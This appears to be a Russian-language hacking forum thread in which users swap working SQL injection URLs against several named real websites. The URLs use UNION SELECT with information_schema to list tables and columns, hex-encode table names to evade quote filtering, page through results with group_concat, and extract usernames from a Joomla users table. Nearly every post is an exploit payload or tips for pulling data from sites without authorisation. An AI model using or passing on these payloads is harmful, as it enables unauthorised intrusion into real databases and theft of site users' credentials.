не пойму как вывести через group_concat(),вот как делаю: Code: http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(table_name%20separator%200?0a),6,7,8,9,10,11,12,13,14,15+from+information_schema.tables-- вот уязвимость без group_concat(): Code: http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
ага) а как разделить сменить на <br> так получается Code: http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+0x3b),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns-- а так нет Code: http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+char(60,98,114,62)),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--
Так тебе нужно? http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+0x3C62723E),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--
Да, это! спасибо! уммммм,хотелось бы посмотреть как выводить данные по кускам, ибо limit здесь не работает пробовал substring в запросе - не прокатывает. Почитал о чем эти говорят: http://forum.antichat.ru/threadnav46016-495-10.html (и предыдущая страница) выводить только на первую букву тоже не катит если очень большая или мальенькая БД а о чем еще способ, который предложил l1ght я вообще не вдуплю. Есть какие предложения?
http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,column_name+from+information_schema.columns+where+table_name='jos_users'/* не показывает колонки в табле чо делать?
Code: http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x6A6F735F7573657273/* Скачать кодировщик
je0n, а что там не понятного? смотри, например, в таблице users n записей: Админ,Бобик,Вовик,Гогик,Додик... предположим group_concat(users) выводит три записи Админ,Бобик,Вовик ставим условие where users>'Вовик' (или 0xВовик) => выводится следущие три записи в алфавитном порядке Ghost0ff, select hex('jos_users') http://k0x.ru/encoder/index.php 1 строчка
хм. Я в случае не отображения ставил md5 тоесть 'jos_users' шифровал и подставлял 0xдалее зашифрованное 'jos_users' в какой шифровке вы это мутите?
Ghost0ff, при чём тут MD5? Если кавычки фильтруются, то это обходится с помощью 0xZZZZZZZZ, где Z-представление каждого байта слова в шестнадцатиричном эквиваленте... То есть для jos_users (без кавычек) это 0x6A6F735F7573657273
Все, понял. Спасибо за толковое описание ) трабла №2: http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,username+from+jos_users/* не отображает (Хочу за 1 раз забать все вопросы меня интересующие) P.S. эти 2 вопроса меня мучали пол жизни
Определяем БД, где таблица jos_users: Code: http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,table_schema+from+information_schema.columns+where+table_name=0x6A6F735F7573657273/* А теперь правильно забираем данные: Code: http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9+union+select+1,username+from+test.jos_users/*
На будущее, когда лазишь по базе, старайся выбирать те таблицы, которые лежат в контексте того юзера, под которым работает бажное приложение: http://www.rfbd.ru/info.php?id=370®ion=59&rubrika=-9999+UNION+SELECT+1,CONCAT_WS(0x3a,table_schema,table_name)+FROM+information_schema.tables+WHERE+table_schema=DATABASE()+LIMIT+0,1--+
http://www.lider-grup.ru/news.php?newsid=-33+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4/* Сбрутил только таблицу новостей.У кого есть хорошие словари,пробегитесь =_=,а то я ф панике.
